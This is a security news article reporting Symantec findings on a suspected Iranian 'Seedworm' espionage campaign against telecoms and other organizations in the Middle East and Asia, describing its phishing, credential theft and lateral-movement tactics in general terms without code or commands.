‘Seedworm’ Attackers Target Telcos in Asia, Middle East

The focused attacks aimed at cyberespionage and lateral movement appear to hint at further ambitions by the group, including supply-chain threats.

Attackers targeting telcos across the Middle East and Asia for the past six months are linked to Iranian state-sponsored hackers, according to researchers. The cyberespionage campaigns leverage a potent cocktail of spear phishing, known malware and legitimate network utilities that are leveraged to steal data and potentially disrupt supply-chains.

Researchers outlined their findings on Tuesday in a report that says attacks are targeting a number of IT services organizations and a utility company. Although the initial attack vector is as yet unclear, threat actors appear to gain entry to networks using spear-phishing and then steal credentials to move laterally, according to the report published by Symantec Threat Hunter Team, a division of Broadcom.
Infosec Insiders Newsletter“Organizations in Israel, Jordan, Kuwait, Saudi Arabia, the United Arab Emirates, Pakistan, Thailand and Laos were targeted in the campaign, which appears to have made no use of custom malware and instead relied on a mixture of legitimate tools, publicly available malware, and living-off-the-land tactics,” researchers wrote in the report.

Though the identity of attackers also is unconfirmed, they potentially could be linked to the Iranian group Seedworm, aka MuddyWater or TEMP.Zagros, researchers said. This group in the past has engaged in widespread phishing campaigns against organizations in the Asia and the Middle East in a mission to steal credentials and gain persistence in the target’s networks.

Specifically, researchers identified two IP addresses used in the campaign that were previously linked to Seedworm activity, as well as some overlap in tools—in particular SharpChisel and Password Dumper, they said.

While there already has been threat activity from Iran against telcos in the Middle East and Asia—the Iranian Chafer APT, for example targeted a major Middle East telco in 2018–a Symantec spokesperson called the activity detailed in the report “a step up” in its focus and a potential harbinger of greater attacks to come.

Breaching Telcos

A typical attack in the latest campaign began with adversaries breaching a targeted network and then attempting to steal credentials to move laterally so that webshells can be deployed onto Exchange Servers, researchers said.

Researchers broke down a specific attack against a telecom company in the Middle East that began in August. In that instance, the first evidence of compromise was the creation of a service to launch an unknown Windows Script File (WSF), researchers said.

Attackers then used scripts to issue various domain, user discovery, and remote service discovery commands, and eventually used PowerShell to download and execute files and scripts. Attackers also deployed a remote access tool that appeared to query Exchange Servers of other organizations, researchers said.

“One feature of this attack against a telecoms organization is that the attackers may have attempted to pivot to other targets by connecting to the Exchange Web Services (EWS) of other organizations, another telecoms operator and an electronic equipment company in the same region,” they wrote.

Supply-Chain Disruption?

Indeed, attackers demonstrated interest in using some compromised organizations as stepping stones or solely to target organizations other than the initial one to mount a supply-chain attack, researchers observed.

In one attack against a utility company in Laos that researchers called an “outlier,” the threat group appeared to exploit a public-facing service to gain initial entry, as the first compromised machine was an IIS web server, according to the report.

Attackers than used PowerShell to deliver malicious tools and scripts to the company’s network and ultimately to connect to a webmail server of an organization in Thailand as well as IT-related servers of another Thai company.

Despite this example, a mystery that remains about the campaign is exactly how attackers are gaining initial entry into the majority of targeted networks, with the only evidence of this discovered at one compromised organization, researchers said.

“A suspected ScreenConnect setup MSI appeared to have been delivered in a zipped file named ‘Special discount program.zip,’ suggesting that it arrived in a spear-phishing email,” they wrote.

There’s a sea of unstructured data on the internet relating to the latest security threats. REGISTER TODAY to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This LIVE, interactive Threatpost Town Hall, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken.

Register NOW for the LIVE event!

Suggested articles